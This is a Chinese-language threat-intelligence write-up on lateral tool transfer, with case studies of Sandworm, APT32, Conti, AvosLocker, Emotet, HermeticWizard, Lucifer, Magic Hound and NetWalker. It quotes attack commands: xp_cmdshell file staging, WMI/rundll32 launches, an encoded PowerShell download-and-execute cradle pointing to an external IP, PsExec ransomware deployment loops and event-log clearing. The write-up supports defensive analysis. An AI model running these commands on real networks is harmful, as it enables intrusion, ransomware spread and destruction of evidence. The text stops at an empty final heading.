勒索软件_横向工具传输

1. 横向工具传输概述

对手可能会在受感染的环境中在系统之间传输工具或其他文件。一旦工具或文件进入受害者环境（即工具传入），对手可能会在不同系统之间复制这些文件，以在操作过程中布置对手的工具或其他文件。具体来说：

• 对手可能会利用内部受害者系统之间的文件共享协议，如通过SMB/Windows管理员共享连接网络共享，或通过远程桌面协议 (RDP) 的认证连接，在系统之间复制文件以支持横向移动。
• 文件也可以通过受害者系统上存在的原生工具或其他工具进行传输，如scp、rsync、curl、sftp 和 ftp。在某些情况下，对手可能会利用网络服务（如Dropbox或OneDrive）通过共享的、自动同步的文件夹，在不同的机器之间复制文件。

其中，文件共享协议和RDP协议依赖于内网的文件共享和远程桌面服务，主要用于Windows系统；而原生工具如FTP、SFTP、scp、rsync等适用于跨平台环境（如Linux、macOS），并且可以通过云存储服务（如Dropbox、OneDrive）进行传输，突破内网限制。两者的传输机制不同，文件共享协议需要共享网络资源或远程桌面连接，而原生工具直接通过命令行工具或互联网服务进行文件传输。

2. 横向工具传输示例

2.1 2015年乌克兰电网袭击

沙虫团队通过在企业网络中植入恶意软件进行凭据收集和网络侦察，利用合法凭据和工具（如PsExec）进行横向移动，随后通过VPN扩展至ICS网络，枚举并控制关键设备，最终实现对工业控制系统的全面访问和破坏性攻击部署。 

2.1.1 企业网络内部的横向移动

部署恶意插件：沙虫团队最初通过在企业网络中植入恶意软件（如BlackEnergy 3）实现入侵，并通过HTTPS下载附加恶意插件。这些插件的主要目的是进行凭据收集、键盘记录以及对网络的侦察活动。

凭据收集：攻击者通过插件收集存储在受感染设备上的凭据，或者通过键盘记录功能获取用户输入的凭据。随后，他们利用这些凭据获得对域控制器或其他关键系统的访问权限，并创建新的管理员账户，扩大访问范围。BlackEnergy插件进行凭据收集

网络侦察和枚举系统：沙虫团队利用有效的凭据和PsExec等工具，在企业网络中进行广泛的内部侦察，枚举网络中的设备，包括UPS设备、数据中心服务器和工作站。通过这种侦察，攻击者能够确定目标设备的位置，并为后续的攻击做好准备。PsExec等工具进行横向移动

2.1.2 在ICS和企业网络之间的横向移动

访问控制系统：沙虫团队通过VPN连接等手段，将企业网络中的活动扩展到ICS网络，特别是控制环境。攻击者通过使用窃取的管理员凭据，与DMS（分布式管理系统）服务器的客户端应用程序进行直接交互。这种访问方式使他们能够控制DMS服务器，并进一步访问控制系统中的其他设备。通过VPN横向移动到工控网络

关键设备的枚举与控制：在ICS网络中，沙虫团队能够利用控制台访问人机界面（HMI）工作站、远程终端单元（RTU）设备、变电站断路器以及串口转以太网转换器等设备。这些设备直接连接到关键的工业控制系统，攻击者可以通过这些设备进行进一步的侦察和控制。

最终目标准备：通过这些手段，沙虫团队获得了对ICS网络中的关键系统的完全访问权限。他们可以通过对这些系统的深度控制，选择攻击目标并部署恶意负载，最终实现破坏性攻击。

2.2 2016年乌克兰电网袭击

沙虫团队通过将文件伪装为“.txt”格式绕过安全检测，成功传递到目标设备后使用move命令重命名为“.exe”执行文件，并利用Mimikatz获取的合法凭证及MS-SQL的xp_cmdshell和PSExec等工具，在工控网络中实现恶意文件的横向移动和执行。

2.2.1 文件传递机制

沙虫团队首先将文件以“.txt”格式传输到ICS（工业控制系统）网络中。这样做的目的是为了绕过基于文件扩展名的简单安全检测系统。很多安全防护系统会对可执行文件（如“.exe”文件）进行严格检查，而“.txt”文件往往被认为是无害的，因此更容易通过检测。绕过基于扩展名的安全检测系统

一旦文件成功传输到目标设备，沙虫团队通过move命令将文件从“.txt”重命名为“.exe”。这一步非常关键，因为它将一个看似无害的文本文件转换为一个可执行文件。具体的命令例如：

EXEC xp_cmdshell 'move C:\Delta\m32.txt C:\Delta\m32.exe';

这种传递和重命名文件的策略非常有效，尤其是在依赖文件扩展名进行检测的系统中。安全系统可能会忽略.txt文件，而恶意文件实际上已经通过初步检测，然后再通过重命名转换为可执行文件，进行后续操作。

2.2.2 工控网络横向移动

通过这种方式，沙虫团队可以将恶意文件逐步传递到网络中的多个目标设备上。这种横向移动的过程不仅依赖于文件传递，还依赖于Mimikatz捕获的合法凭证，以及使用MS-SQL的xp_cmdshell命令在网络中执行命令。例如，他们通过远程命令执行文件，并通过其他工具如PSExec来在目标系统上执行任务。

EXEC xp_cmdshell 'net use L: \\<TargetIP>\$C <Password> /USER:<Domain>\<User>';

2.3 2022年乌克兰电网袭击

沙虫团队利用暂存服务器存放CaddyWiper，通过组策略对象 (GPO) 将恶意文件msserver.exe 自动复制到目标系统，并通过任务调度在指定时间执行，使用TANKTRAP等工具确保CaddyWiper在多个设备上隐蔽、高效地传播和运行。

2.3.1 暂存服务器

沙虫团队首先在受害者网络中的某个位置设置了暂存服务器，暂存服务器用于存放CaddyWiper的可执行文件msserver.exe。这一服务器是文件传输的中转站。

2.3.2 组策略对象利用

沙虫团队通过域控制器配置了组策略对象 (GPO)，利用其自动化功能，将msserver.exe文件从暂存服务器复制到目标系统的本地硬盘。GPO是Windows中用于集中管理网络中多个计算机配置的工具，沙虫团队通过这一机制实现了文件的批量复制。

2.3.3 文件复制到本地硬盘

通过GPO的推送，msserver.exe文件被自动传输到目标设备的指定目录。这一过程无需用户手动干预，完全自动化进行，确保了文件能够迅速传播到网络中的多个节点。

2.3.4 任务调度与文件执行

沙虫团队还利用GPO创建任务调度，安排在特定的时间点执行msserver.exe。任务调度可以确保CaddyWiper的执行在受害者系统上按计划进行，进一步提升了攻击的隐蔽性和高效性。通过这些任务，msserver.exe在本地硬盘中被激活并运行。

在整个过程中，沙虫团队使用了名为TANKTRAP的PowerShell工具，该工具通过Windows组策略自动传播和启动CaddyWiper。TANKTRAP与其他破坏性工具（如NEARMISS、SDELETE、PARTYTICKET）一起配合使用，确保CaddyWiper能够在多个受害设备上按计划执行。

2.4 APT 组织 Aoqin Dragon

攻击者通过伪装成可移动设备的快捷方式文件，利用DLL劫持加载恶意软件，检查设备环境并复制恶意模块，通过设置自动启动功能确保重启后继续执行，最终解密并加载有效载荷，将恶意软件传播到其他可移动设备并隐蔽地远程控制目标系统。

2.4.1 伪装成可移动设备

攻击者首先创建了一个假冒的可移动磁盘快捷方式文件，该文件包含一个特定的路径，用于启动恶意软件。当用户点击该假设备时，它会执行名为“Evernote Tray Application”的程序，利用DLL劫持技术加载恶意的encrashrep.dll加载器，模拟成explorer.exe。

2.4.2 检查设备环境

在执行加载器后，恶意软件会首先检查自己是否运行在连接的可移动设备中。如果加载器不在可移动磁盘上，它会将所有模块复制到目标设备上的对应路径。这些模块包括正常文件、后门加载器以及加密的后门载荷。

2.4.3 设置自动启动

恶意软件通过在系统中设置自动启动功能，将值设为“EverNoteTrayUService”。这样，当用户重启计算机时，恶意软件会再次执行“Evernote Tray Application”，并通过DLL劫持加载恶意加载器。

2.4.4 解密并加载有效载荷

加载器会首先检查文件路径，然后解密恶意软件的载荷。该攻击链中包含两个有效载荷：传播器会将所有恶意文件复制到连接的可移动设备，从而进一步传播恶意软件到其他系统。后门程序会注入到rundll32的内存中，以便在目标系统中进行隐蔽的远程控制和执行。

2.5 APT 组织 APT32

APT32 通过使用自定义版 Mimikatz 提取 NTLM 哈希和 Kerberos 票据，执行 “Pass-the-Hash” 和 “Pass-the-Ticket” 攻击，利用 Windows Admin Shares 和 WMI 在远程机器上复制并执行恶意软件，通过合法进程加载恶意 DLL 文件，从而实现横向移动并保持隐蔽性。

2.5.1 凭证利用

为了进行横向移动，APT32首先需要获得网络中关键的凭证。通过使用自定义版的Mimikatz等工具，他们能够从受感染的机器中提取Windows账户的NTLM哈希和Kerberos票据。这些凭证是执行“Pass-the-Hash”和“Pass-the-Ticket”攻击的关键工具。

Mimikatz工具：APT32使用了修改版的Mimikatz，确保其能够绕过防病毒软件检测，并通过该工具提取了管理员的NTLM哈希和Kerberos票据。这些凭证使APT32能够以管理权限进行横向移动。

APT32使用获取的NTLM哈希和Kerberos票据执行“Pass-the-Hash”和“Pass-the-Ticket”攻击，这些技术允许攻击者在没有明文密码的情况下，利用哈希或票据身份在目标系统上执行操作。这使得他们能够以网络管理员的身份在目标机器上执行远程命令。

Pass-the-Hash：APT32使用从管理账户中获得的NTLM哈希，在目标机器上执行身份验证并部署工具。通过这种方式，他们能够在不需要实际密码的情况下使用被盗的哈希进行身份验证，获得远程机器的访问权限。                                   

Pass-the-Ticket：在获得Kerberos票据后，APT32利用“Pass-the-Ticket”技术访问网络中的其他机器。这种技术使得攻击者能够绕过密码输入，通过票据模拟合法用户身份，从而执行远程命令或工具部署。

2.5.2 Windows Admin Shares

APT32还利用了Windows内置的网络共享工具（如net.exe）进行横向移动。他们通过管理员共享（Windows Admin Shares）将恶意工具复制到远程机器上，并通过远程执行命令的方式运行这些工具，具体来说：首先使用net.exe将工具从受感染的机器传输到目标机器。之后利用管理员共享的权限，在目标机器上执行恶意工具。运行恶意软件

2.5.3 Windows管理规范（WMI）

APT32通过Windows Management Instrumentation (WMI)进一步增强了横向移动的能力。WMI允许他们使用管理员凭证在远程机器上执行命令和部署恶意软件。通过WMI，APT32将恶意DLL文件（例如msfte.dll）部署到目标机器上。具体来说：首先使用WMI命令将msfte.dll复制到目标机器。之后使用WMI重启Windows搜索服务（Wsearch），使恶意DLL通过合法的进程加载和运行。恶意DLL注入

2.6 勒索软件 CONTI

攻击者利用WMI远程调用rundll32.exe加载并执行Cobalt Strike的恶意DLL文件，并通过DLL注入技术将恶意代码注入到Windows的合法进程（如svchost.exe）中，从而隐蔽地控制目标系统并与指挥控制服务器通信。

2.6.1 Cobalt Strike的加载与执行

WMI是一种Windows内置的管理工具，允许远程执行命令。攻击者利用WMI，通过命令在远程目标主机上运行程序或执行脚本，而无需物理访问或用户交互。在这种攻击中，威胁者使用WMI的Win32_Process类，创建并运行恶意程序。通过远程调用rundll32.exe，攻击者可以在目标主机上执行恶意DLL文件。

Invoke-WmiMethod -Path Win32_Process -Name Create -ArgumentList "rundll32.exe C:\path\to\143.dll,EntryPoint"

通过WMI执行远程命令后，rundll32.exe加载并执行恶意DLL文件。Cobalt Strike的beacon通过DLL的入口函数在目标系统中启动。beacon随后与攻击者的指挥控制服务器（C2）建立通信，允许攻击者控制目标系统。

2.6.2 恶意DLL注入合法进程 

为了进一步隐蔽攻击活动，威胁者通过DLL注入技术，将恶意DLL文件（Cobalt Strike beacon）注入到Windows的合法系统进程中（如svchost.exe）。

rundll32.exe C:\path\to\143.dll,EntryPoint

通过将DLL注入到svchost.exe等合法进程，恶意代码得以隐藏在系统正常运行的进程中，降低被检测到的可能性。

2.6.3 持久化与进一步横向移动

一旦Cobalt Strike beacon在目标主机上运行，攻击者可以通过该控制通道进一步扩展攻击范围。常见操作包括：

• 远程执行更多命令：使用WMI在其他网络节点上重复执行类似命令，部署更多恶意载荷。
• 收集信息：使用内置模块（如Invoke-ShareFinder）扫描网络，寻找可访问的共享文件或资源。

通过这种方式，威胁者能够有效地利用WMI和合法的Windows工具在整个网络中扩展感染，进而执行勒索软件或窃取数据。

2.7 勒索软件 AvosLock

攻击者在横向移动过程中使用了多种技术和工具。首先，他们利用 WMIC 工具远程修改目标机器的管理设置，无需物理访问设备即可执行命令。接着，攻击者通过 PowerShell 执行远程命令，下载并执行恶意载荷，扩展对网络中其他主机的控制。AnyDesk 作为合法的远程桌面工具也被滥用，用于远程访问和控制网络中的其他主机。此外，攻击者还使用 PDQ Deploy 软件部署工具，将恶意软件传播到整个网络。最后，他们使用 SoftPerfect 网络扫描仪 等工具进行网络扫描，收集其他主机和开放端口的信息，以支持进一步的横向移动。

2.7.1 WMIC的利用

攻击者使用了WMIC工具，远程修改目标机器的管理设置。这种技术常用于横向移动，因为它允许攻击者在没有物理访问目标设备的情况下，通过网络远程执行命令。

攻击者通过WMIC修改本地和远程主机上的管理设置。通过这种方式，攻击者可以控制远程计算机，并执行各种管理任务，例如安装恶意软件、下载工具或提取敏感数据。

2.7.2 PowerShell的利用

PowerShell是攻击者常用的工具，因其强大的脚本功能和系统权限，攻击者可以通过PowerShell执行远程命令，下载和执行恶意软件。本文中多次提到攻击者通过PowerShell的DownloadString方法下载并执行恶意载荷，进一步扩展对网络中的其他主机的控制。

# Powershell命令
powershell.exe -exec bypass -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHKACWB0AGUAbQAuAEAZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKAKQAUAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAAA6ACAALwA0ADUALgAxADMANgAuADIAMwAwACAWAADEAOgA0ADAAMAAwACAAyADMANABSADIAMWAnACkAOwA=

# 解码后命令
iex (New-Object SystemNetWebClient).DownloadString('http://45[.]136[.]230[.]191:4000/D234R23');

2.7.3 AnyDesk与PDQ Deploy利用

AnyDesk是一个合法的远程桌面工具，但在此次攻击中被滥用为横向移动工具。攻击者通过AnyDesk远程访问和控制其他网络中的主机，将恶意工具（例如SoftPerfect网络扫描仪）传输到新的主机上。

远程访问和文件传输：攻击者利用AnyDesk将SoftPerfect网络扫描仪传输到网络中的另一台服务器。SoftPerfect网络扫描仪是一款合法的网络扫描工具，能够扫描网络中的端口和共享资源，为攻击者提供进一步横向移动的目标。

GUI控制：AnyDesk的图形用户界面（GUI）功能允许攻击者直接在目标机器上执行命令和部署恶意软件。例如，攻击者可以通过GUI查看目标机器的进程列表、修改设置或执行恶意代码。

PDQ Deploy是一款合法的软件部署工具，通常用于在企业环境中自动化部署软件和更新。攻击者滥用这款工具，将恶意软件传播到整个网络中的其他主机上。

大规模自动化部署：攻击者使用PDQ Deploy将恶意软件（包括AvosLocker勒索软件、网络扫描工具等）传播到多个主机。这使得他们能够快速扩散感染，尤其是在大型网络中。

文件部署与执行：PDQ Deploy允许攻击者批量部署恶意软件，并在目标主机上自动执行，这加速了勒索软件的传播和执行。例如，攻击者通过PDQ Deploy将勒索软件部署到目标网络中的多个服务器和工作站，最后进行文件加密。

2.7.4 网络扫描与信息收集

攻击者在横向移动过程中使用了多个网络扫描工具，例如SoftPerfect网络扫描仪，用于发现网络中的其他主机和开放端口。

网络探测：攻击者使用SoftPerfect网络扫描仪扫描网络中的开放端口、共享资源等。扫描结果帮助他们确定潜在的攻击目标，尤其是可以通过网络连接直接访问的机器。

进一步的横向移动目标选择：通过网络扫描工具，攻击者能够识别网络中的高价值目标（如文件服务器、数据库等），然后通过WMIC、PowerShell等手段进一步感染这些目标。

2.8 后门程序 DustySky

攻击者首先通过发送包含恶意附件或链接的钓鱼邮件发起攻击，目标执行后会安装 DustySky 恶意软件。初始感染后，DustySky 通过收集系统信息来规避检测并建立持久性，随后扫描网络共享和可访问系统，通过复制自身传播到其他设备。通过与 C2 服务器通信，DustySky 接收进一步指令执行横向移动和下载更多恶意组件，并滥用窃取的凭证进行手动或自动化的横向传播，特别是当获取特权账户时，可以轻松访问网络中的其他系统和数据。

2.8.1 初始攻击

攻击者首先通过发送钓鱼邮件发起攻击，这些邮件包含恶意附件或链接，指向恶意软件的下载页面。附件通常伪装成合法的文件、可执行文件或压缩包（如 .RAR 或 .ZIP 文件）。一旦目标下载并执行了恶意附件，DustySky 恶意软件就会安装在受害者的计算机上。

2.8.2 感染后行为

在初始感染后，DustySky 恶意软件分阶段运行。其投递组件（dropper）会安装核心恶意软件，建立持久性，并尝试通过规避杀毒软件和沙盒环境检测来隐藏自身。恶意软件能够收集初步的系统信息（例如操作系统版本、运行的进程和已安装的软件）。这些侦察信息对于后续操作（包括横向移动）非常重要。

2.8.3 横向移动

DustySky 会扫描网络共享、可移动媒体和网络中其他可访问的系统。通过将自身复制到这些位置，恶意软件尝试在网络中传播。

恶意软件的命令和控制（C2）服务器可能会指示其提取额外的组件（如键盘记录程序），或使用工具（如 BrowserPasswordDump）收集的凭证。这些凭证可以用于访问同一网络中的其他系统，从而实现进一步的横向移动。

2.8.4 命令和控制通信

DustySky 与其 C2 服务器进行通信，发送系统详细信息和窃取的数据。同时，它还接收来自 C2 的进一步指令，可能包括传播到网络中的其他系统、下载更多恶意负载，或执行横向移动命令。通信使用 HTTP 和 HTTPS 协议，有时通过自签名或合法的数字证书进行加密，以逃避检测。

2.8.5 滥用窃取的凭证

在收集了受感染机器的凭证后，攻击者可能会使用这些凭证通过登录网络中的其他系统进行横向移动。这可以是手动操作，也可以通过脚本自动完成。尤其是当获得了特权账户的凭证时，攻击者能够轻松访问网络中的其他机器和数据。

2.9 僵尸网络 Emotet

Emotet 通过恶意邮件传播，作为加载器感染系统并加载 Wi-Fi 传播模块。该模块使用 Wi-Fi 网络接口枚举可用网络并尝试暴力破解 Wi-Fi 密码。一旦成功连接到网络，Emotet 会扫描共享资源并对用户账号进行暴力破解，将恶意文件投放到目标设备。随后通过远程执行恶意软件，启动服务并与 C2 服务器通信，持续在网络中横向传播和感染其他设备。

2.9.1 初始感染

motet 作为一个高度复杂的木马，首先通过恶意邮件（malspam）进行传播。其主要功能之一是充当加载器，用于加载其他恶意软件或自定义模块。

 Wi-Fi 传播器是通过 ID 为 5079 的模块和 executeFlag 为 1 的方式加载的。该模块在系统的 C:\ProgramData 目录下被提取并执行。该模块通过一个自解压的 RAR 文件包含了两个二进制文件：service.exe 和 worm.exe，其中 worm.exe 是主要用于 Wi-Fi 网络扩散的执行文件。

2.9.2 感染传播

Emotet 使用 wlanAPI.dll 来管理和枚举 Wi-Fi 网络。worm.exe 通过调用 WlanEnumInterfaces 函数枚举本地计算机上所有启用的 Wi-Fi 设备，接着使用 WlanGetAvailableNetworkList 函数获取所有可用网络的信息。

收集的信息包括 SSID（网络名称）、信号强度、安全协议（如 WPA、WPA2 等）、加密方式（如 TKIP、AES 等）等。

接下来，恶意软件会通过构建 Wi-Fi 网络配置文件并尝试使用内置的密码列表对所有获取到的 Wi-Fi 网络进行暴力破解。破解成功后，恶意软件会连接到该 Wi-Fi 网络。

2.9.3 横向移动

一旦连接成功，worm.exe 会扫描网络中所有非隐藏的共享资源。它首先尝试访问 IPC$ 共享资源，枚举该网络资源下的所有用户。

然后，worm.exe 使用其内置的第二个密码列表，对所有用户账号进行暴力破解。如果破解成功，它会将用户名和密码存储起来，随后尝试通过 C$\ 共享资源访问目标设备的 C: 盘，并将 service.exe 文件作为 my.exe 投放到目标系统中。

2.9.4 远程执行与感染扩散

当 service.exe 被投放到远程设备后，恶意软件会通过 Windows 服务控制器将其注册为一个名为 "Windows Defender System Service" 的服务，并启动该服务。service.exe 主要负责两个任务：首先是与C2（指挥控制）服务器进行通信，通知其服务已成功安装；其次是在本地系统上执行嵌入的 Emotet 恶意软件。

2.9.5 进一步传播

在成功感染一个 Wi-Fi 网络中的设备后，Emotet 会继续尝试在该网络中的其他设备上复制和执行相同的恶意代码。这种横向移动不仅仅依赖于网络中的共享资源，还使用了密码暴力破解和对 Wi-Fi 网络的多次连接尝试，以确保感染更多的设备。

2.10 蠕虫病毒 HermeticWizard

HermeticWizard 首先通过本地网络发现潜在目标机器，使用多种 Windows 函数收集 IP 地址并进行端口扫描，随后利用 WMI 或 SMB 协议传播，通过远程文件拷贝与执行机制实现横向移动。在 SMB 中，它通过硬编码的用户名和密码列表进行身份验证，成功后将自身文件传输到目标机器并执行。完成横向传播后，HermeticWizard 会拷贝并执行 HermeticWiper 来破坏目标系统，并通过清理日志掩盖攻击痕迹。

2.10.1 网络扫描与目标发现

HermeticWizard 首先通过本地网络发现其他可访问的机器。它会收集本地已知的 IP 地址，并通过以下 Windows 函数查找更多的目标 IP 地址：

DNSGetCacheDataTable：获取 DNS 缓存数据表；GetIpNetTable：获取 IP 网络表，包括 MAC 地址和 IP 地址的映射；WNetOpenEnumW：列举网络资源，如共享文件夹等；NetServerEnum：列举网络服务器和共享资源；GetTcpTable：获取 TCP 连接表，用于查找活跃的网络连接；GetAdaptersAddresses：列出本地网络适配器和它们的地址。

这些函数会帮助 HermeticWizard 在本地网络中发现潜在目标。找到 IP 地址后，HermeticWizard 会检查这些 IP 地址是否可达。在有 -s 参数时，它还会扫描整个 /24 范围，即从已知 IP 地址的范围内扫描，如从 192.168.1.1 到 192.168.1.254。

2.10.2 端口扫描

找到潜在目标后，HermeticWizard 会尝试连接到这些 IP 地址上的某些端口。它会随机顺序扫描以下端口：

20/21: FTP；22: SSH；80: HTTP；135: RPC；137/139: NetBIOS；443: HTTPS；445: SMB。

由于端口扫描顺序是随机的，因此很难通过流量特征来识别 HermeticWizard 的活动。

2.10.3 利用 WMI 进行传播

一旦 HermeticWizard 发现了可到达的目标，它会通过 WMI 进行传播，WMI 是一种常用的 Windows 管理接口。它将其名为 exec_32.dll 的传播器拷贝到远程机器上。其详细操作如下：

• 远程文件拷贝：HermeticWizard 通过调用 WNetAddConnection2W 连接到目标机器的 ADMIN$ 共享目录，并将自身拷贝到目标机器。目标文件名是通过调用 CoCreateGUID 生成的随机名称，如 cB9F06408D8D2.dll。
• 远程执行：文件拷贝完成后，它会通过 DCOM（分布式组件对象模型）调用 WMI 在目标机器上执行拷贝的 DLL 文件。具体操作是通过 CoCreateInstance 创建 CLSID_WbemLocator 实例，并使用 WMI 的 Win32_Process 在远程机器上创建一个新的进程，运行命令 C:\windows\system32\cmd.exe /c start C:\windows\system32\\regsvr32.exe /s /i C:\windows\<文件名>.dll。
• 回退机制：如果 WMI 技术失败，HermeticWizard 会尝试通过 OpenRemoteServiceManager 在目标机器上创建一个服务，以执行相同的命令。
• 清理：如果远程 DLL 成功执行，HermeticWizard 会保持休眠，直到可以删除远程机器上的拷贝文件。

2.10.4 利用 SMB 进行传播

HermeticWizard 的第二种传播方式是通过 SMB，名为 romance.dll 的模块实现这一功能。它的操作步骤类似于 WMI 传播器，但它利用了 SMB 协议。其详细操作如下：

• HermeticWizard 在横向移动时首先尝试连接目标机器上的 SMB 管道，包括 samr、browser、netlogon、lsarpc、ntsvcs 和 svcctl。这些管道与远程系统的身份验证服务、网络资源及系统服务交互密切相关，是攻击者在横向移动中常用的通道。
• 接着，HermeticWizard 使用硬编码的用户名和密码列表，尝试通过 NTLMSSP 协议对 SMB 共享进行身份验证。尽管这些凭据（如 guest、admin、123、Qwerty123 等）非常简单，但在保护不足的网络中，它们仍然有可能成功破解。
• 一旦身份验证成功，HermeticWizard 会将自身的文件传输到目标机器的 ADMIN$ 共享目录。随后，使用 SMB 协议，通过 cmd /c start regsvr32 /s /i ..\\<文件名> 命令在目标机器上执行文件，从而启动传播器。

2.10.5 执行HermeticWiper

HermeticWizard 成功传播后，它会将 HermeticWiper 拷贝到目标机器上，并通过相同的手段执行 HermeticWiper，开始破坏目标系统。同时，HermeticWizard 通过执行 wevtutil cl System 命令来清理目标系统的日志。这一步骤旨在删除攻击痕迹，防止系统管理员或安全团队轻易追踪到其活动。

2.11 僵尸网络 Lucifer

Lucifer 通过扫描目标网络中的开放端口（如 135 和 1433），利用暴力破解和已知高危漏洞（如 EternalBlue 和 EternalRomance）获取未经授权的访问，并通过 SMB 和 WMI 等协议在内网和外网中传播恶意软件，一旦成功入侵后，Lucifer 使用 certutil 工具下载并执行自身的副本，从而实现持续感染和扩散。

2.11.1 网络扫描

Lucifer 会首先扫描目标网络，重点扫描开放的 TCP 端口，包括 135 (RPC) 和 1433 (MSSQL)。当检测到这些端口时，它会尝试通过暴力破解登录凭据来获得未经授权的访问。针对 RPC 端口，Lucifer 使用内嵌的用户名（如 administrator）和密码列表（如 123, Qwerty123 等）进行暴力破解。一旦成功登录，它会将自身二进制文件复制到远程主机并执行。

2.11.2 凭据利用

Lucifer 通过暴力破解 TCP 端口 1433 的 MSSQL 登录，使用同样的用户名和密码列表进行尝试。如果成功登录，Lucifer 会执行 shell 命令，从远程主机下载并执行其副本。此时，Lucifer 已在目标系统上成功执行并驻留。

2.11.3 漏洞利用与传播

除了凭据暴力破解外，Lucifer 还通过利用已知的高危漏洞进行自我传播，特别是针对 SMB 端口开放的目标。它使用了多个漏洞进行攻击，包括 EternalBlue (CVE-2017-0144)、EternalRomance (CVE-2017-0145) 以及 DoublePulsar 后门。当目标设备的 SMB 端口（445）开放时，Lucifer 会利用这些漏洞进行入侵并植入 DoublePulsar 后门，随后通过使用 Windows 工具 certutil 进一步传播恶意软件。

2.11.4 内网感染

在内网中，Lucifer 的传播主要依靠 SMB 和 WMI。通过这些协议，它可以使用暴力破解凭据以及通过漏洞入侵邻近设备。一旦感染成功，Lucifer 会复制并运行恶意软件，从而进一步传播感染。

2.11.5 外网攻击

对于外网目标，Lucifer 会生成随机的非私有 IP 地址并发起 HTTP 请求，若返回有效响应，则利用已知漏洞（如 CVE-2014-6287 针对 HFS，CVE-2018-1000861 针对 Jetty，CVE-2017-10271 针对 Oracle WebLogic，以及 ThinkPHP 和 PHPStudy 的远程代码执行漏洞）进行攻击，成功后通过 certutil 下载并执行自身的副本，从而持续传播。

2.12 APT组织 Magic Hound

攻击者通过利用 Microsoft Exchange 服务器中的 ProxyShell 漏洞链获得初始访问权限，启用内置账户并使用 RDP 进行横向移动，将工具传输到服务器并设置持久性，通过 LSASS 转储获取域管理员凭据，使用 RDP 和 Impacket 的 wmiexec 工具进一步扩展攻击，最终通过部署批处理脚本加密服务器驱动器，导致系统不可访问。

2.12.1 初始访问

攻击者首先利用了 Microsoft Exchange 服务器中的 ProxyShell 漏洞链（CVE-2021-34473、CVE-2021-34523、CVE-2021-31207）获取了系统的初始访问权限。通过这些漏洞，攻击者能够以系统权限在 Exchange 服务器上执行任意代码。随后，他们部署了多个 Web Shell，利用这些 Web Shell 进一步执行命令，开展初步的发现操作。

2.12.2 启用内置账户并使用 RDP 移动

通过 Web Shell 获取对系统的完全控制权后，攻击者启用了内置的 DefaultAccount 账户，并将其添加到管理员和远程桌面用户组中。此操作使攻击者可以通过远程桌面协议（RDP）连接到 Exchange 服务器。随后，攻击者使用 Plink 工具创建了一个 SSH 隧道，将 RDP 暴露到外网，并通过该隧道进行远程连接。

2.12.3 工具传输与持久化

在获得 RDP 访问权限后，攻击者将他们的工具（如 CacheTask.zip）传输到服务器，并通过批处理脚本 install-proxy.bat 创建目录、移动文件并建立定时任务。该任务会执行 Fast Reverse Proxy（FRP），用于代理和维持 RDP 连接的持久性。此后，攻击者使用该 RDP 连接进一步控制系统。

2.12.4 LSASS 转储与横向移动

通过 RDP 连接，攻击者使用任务管理器导出 LSASS（本地安全授权子系统服务）进程的内存转储文件，该文件包含敏感的身份验证凭据。之后，攻击者利用盗取的域管理员账户，通过 RDP 和其他方法（如使用 Impacket 的 wmiexec 工具）在网络中进行横向移动。攻击目标包括备份服务器和域控制器，攻击者使用 KPortScan 3.0 进行端口扫描，以识别内部网络中的更多潜在目标。

2.12.4 使用远程桌面连接工具进一步扩展

在横向移动过程中，攻击者继续通过 RDP 访问其他关键服务器，并部署 FRP 代理到这些服务器上，确保持久控制。同时，攻击者将批处理脚本 setup.bat 部署到服务器上，该脚本会启用 BitLocker，对系统驱动器进行加密，最终使这些系统无法访问。

2.13 勒索软件 Netwalker

NetWalker 攻击者通过利用漏洞或暴力破解 RDP 密码获取初始访问权限，使用提权工具（如 Mimikatz）窃取凭据后，通过 PsExec 和 PowerShell 脚本在网络中横向传播勒索软件，同时删除安全防护软件并使用 certutil 保持持久控制。

2.13.1 初始访问与凭据窃取

NetWalker 攻击者通常通过利用已知漏洞（如 Tomcat 或 WebLogic 漏洞）或使用暴力破解工具（如 NLBrute）针对弱 RDP（远程桌面协议）密码，获得对目标网络的初始访问权限。NLBrute 使用包含用户名和密码的配置文件，尝试暴力破解具有远程桌面服务的系统。一旦攻破了一个目标，攻击者就会使用 SoftPerfect 网络扫描器 识别网络中具有开放 SMB 端口的其他计算机。

2.13.2 提权与后续传播

在获得初始访问权限后，NetWalker 攻击者使用提权工具（如 Mimikatz、Mimidogz 和 Mimikittenz）窃取目标网络中的域管理员或其他高权限账户的凭据。这些工具通过窃取内存中的明文密码或哈希值，帮助攻击者获得更高级别的权限，从而在网络中进一步传播。此外，攻击者利用一系列已知的提权漏洞进行攻击，如 CVE-2015-1701、CVE-2017-0213 和 CVE-2019-1458，这些漏洞可以帮助他们在 Windows 系统上提升权限。

2.13.3 利用 PsExec 工具横向移动

获得高权限账户后，攻击者使用 Microsoft SysInternals 套件中的 PsExec 工具 实现横向移动。PsExec 允许攻击者在网络中远程执行命令，而不需要物理访问目标机器。攻击者通过 PsExec 将恶意软件或脚本传输到网络中的其他设备，并远程执行。例如，他们可以使用 PsExec 将 NetWalker 勒索软件的可执行文件传输到多个计算机，并通过命令远程启动该文件：

psexec.exe \\{目标IP} -d -c -f c:\programdata\rundl1.exe

该命令会将恶意软件复制到目标机器的 c:\programdata\ 目录，并远程执行它。

2.13.4 利用 PowerShell 实现进一步传播

除了 PsExec，NetWalker 攻击者还使用 PowerShell 脚本进行横向传播。他们通过批处理文件，使用 PowerShell 远程执行恶意脚本，进一步将勒索软件分发到目标网络的其他机器。例如，攻击者可以通过 PsExec 执行以下命令，在每个发现的目标机器上运行 PowerShell 脚本：

for /f %%G IN (%INPUT_FILE%) DO PsExec.exe -d \\%%G powershell -ExecutionPolicy Bypass -NoProfile -NoLogo -NoExit -File \\{路径}\{脚本}.ps1

这会在每个目标机器上执行指定的 PowerShell 加载器脚本，最终将 NetWalker 勒索软件加载到内存中并执行。

2.13.5 删除安全防护软件与持久化

攻击者使用工具删除受害者系统中的防病毒软件和安全工具，这些工具包括 ESET 的 AV Remover 和 Trend Micro 的 WorryFree Uninstall。此外，攻击者通过 PowerShell 和 PsExec 部署命令，确保勒索软件能够在目标系统上持续执行，并使用 certutil 工具从外部服务器下载恶意文件，进一步保持持久性和控制权。

2.14 恶意软件 Olympic Destroyer

